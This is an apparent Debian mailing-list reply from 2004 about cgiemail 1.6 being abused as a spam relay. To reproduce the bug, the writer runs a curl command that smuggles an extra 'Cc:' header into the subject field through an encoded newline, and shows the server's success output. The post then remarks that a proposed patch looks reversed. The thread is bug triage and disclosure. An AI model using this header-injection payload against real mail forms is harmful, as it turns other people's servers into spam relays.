On Fri, Jan 23, 2004 at 01:12:48PM +0200, Ian Forbes wrote: > I discovered this morning that our web server has been exploited for the > relaying of spam. It has the latest "cgiemail" program distributed with > Debian installed on it. > > First thing I did was disable the cgiemail executable to stop the flow > of spam. > > Then I did some research. This is not a totally new scenario. After a > little web searching I have found: > > 1) An open bug report: > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=222870
In that bug report, the maintainer claims that the bug is not reproducible with cgiemail 1.6, but it seems to work for me: mizar:[~] curl -d '[EMAIL PROTECTED]&subject=foobar%0aCc:[EMAIL PROTECTED]' http://sikuani.its.monash.edu.au/cgi-bin/cgiemail/template/test <HEAD><TITLE>Success</TITLE></HEAD> <BODY>The following email message was sent.<P><HR><PRE> From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: foobar Cc: [EMAIL PROTECTED] What is your name? What is your quest? What is your favourite colour? </PRE><P> <P><EM>cgiemail 1.6 </EM></BODY> > 3) A patch which might fix the problem > http://www.securityfocus.com/archive/1/340174 That patch is both in "normal" diff format, which makes it difficult to use and read, and also seems to have been generated backwards, removing lines when it should be adding them. I cannot judge its correctness, either, though the description of the solution seems valid. -- - mdz
